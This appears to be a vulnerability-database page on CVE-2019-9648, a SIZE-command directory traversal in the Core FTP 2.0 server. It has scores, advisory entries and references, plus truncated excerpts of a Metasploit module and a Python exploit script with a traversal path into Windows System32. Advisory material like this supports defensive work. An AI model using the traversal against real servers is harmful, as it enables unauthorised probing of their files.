CVE-2019-9648
published 2019-03-22CVE-2019-9648: An issue was discovered in the SFTP Server component in Core FTP 2.0 Build 674. A directory traversal vulnerability exists using the SIZE command along with a…
PriorityP347medium5.3CVSS 3.0
AVNACLPRNUINSUCLINAN
EXPLOIT
EPSS
14.33%
96.2th percentile
An issue was discovered in the SFTP Server component in Core FTP 2.0 Build 674. A directory traversal vulnerability exists using the SIZE command along with a \..\..\ substring, allowing an attacker to enumerate file existence based on the returned information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| coreftp | core_ftp | — | — |
CVSS provenance
nvdv3.05.3MEDIUMCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
CoreFTP Directory Traversal
ghsa·2022-05-14
CVE-2019-9648 [MEDIUM] CWE-22 CoreFTP Directory Traversal
CoreFTP Directory Traversal
An issue was discovered in the SFTP Server component in Core FTP 2.0 Build 674. A directory traversal vulnerability exists using the SIZE command along with a `\..\..\` substring, allowing an attacker to enumerate file existence based on the returned information.
OSV
CoreFTP Directory Traversal
osv·2022-05-14
CVE-2019-9648 [MEDIUM] CoreFTP Directory Traversal
CoreFTP Directory Traversal
An issue was discovered in the SFTP Server component in Core FTP 2.0 Build 674. A directory traversal vulnerability exists using the SIZE command along with a `\..\..\` substring, allowing an attacker to enumerate file existence based on the returned information.
No detection rules found.
Exploit-DB
CoreFTP 2.0 Build 674 SIZE - Directory Traversal (Metasploit)
exploitdb·2020-03-11·CVSS 5.3
CVE-2019-9648 [MEDIUM] CoreFTP 2.0 Build 674 SIZE - Directory Traversal (Metasploit)
CoreFTP 2.0 Build 674 SIZE - Directory Traversal (Metasploit)
---
class MetasploitModule 'CVE-2019-9648 CoreFTP FTP Server Version 674 and below SIZE Directory Traversal',
'Description' => %q{An issue was discovered in the SFTP Server component in Core FTP 2.0 Build 674. A directory traversal vulnerability exists using the SIZE command along with a \..\..\ substring, allowing an attacker to enumerate file existence based on the returned information},
'Author' => [ 'Kevin Randall' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2019-9648' ],
[ 'BID', '107446' ],
[ 'URL', 'https://www.coreftp.com/forums/viewtopic.php?f=15&t=4022509' ]
],
'Disclosure Date:' => 'March 13 2019'
)
register_options([
Opt::RPORT(21),
OptString.new('FILENAME', [true, "Name of file to search on remote ser
Exploit-DB
Core FTP Server FTP / SFTP Server v2 Build 674 - 'SIZE' Directory Traversal
exploitdb·2019-03-13·CVSS 5.3
CVE-2019-9648 [MEDIUM] Core FTP Server FTP / SFTP Server v2 Build 674 - 'SIZE' Directory Traversal
Core FTP Server FTP / SFTP Server v2 Build 674 - 'SIZE' Directory Traversal
---
# Exploit Title: CoreFTP Server FTP / SFTP Server v2 - Build 674 SIZE Directory Traversal
# Google Dork: N/A
# Date: 4/27/2019
# Exploit Author: Kevin Randall
# Vendor Homepage: https://www.coreftp.com
# Software Link: http://www.coreftp.com/server/index.html
# Version: Firmware: CoreFTP Server FTP / SFTP Server v2 - Build 674
# Tested on: Windows 7
# CVE : CVE-2019-9648
#!/usr/bin/python
import socket
import sys
########################################################
###########Set Variables For Script Here################
file_to_look_for = "nslookup.exe"
local_disk_drive = " C:"
path_traversal = "\..\..\..\..\..\Windows\System32\\"
########################################################
print ("""
No writeups or analysis indexed.
http://packetstormsecurity.com/files/154204/CoreFTP-Server-SIZE-Directory-Traversal.htmlhttp://seclists.org/fulldisclosure/2019/Aug/21http://www.coreftp.com/forums/viewtopic.php?f=15&t=4022509http://www.securityfocus.com/bid/107446https://seclists.org/fulldisclosure/2019/Mar/23https://www.exploit-db.com/exploits/46535http://packetstormsecurity.com/files/154204/CoreFTP-Server-SIZE-Directory-Traversal.htmlhttp://seclists.org/fulldisclosure/2019/Aug/21http://www.coreftp.com/forums/viewtopic.php?f=15&t=4022509http://www.securityfocus.com/bid/107446https://seclists.org/fulldisclosure/2019/Mar/23https://www.exploit-db.com/exploits/46535
2019-03-22
Published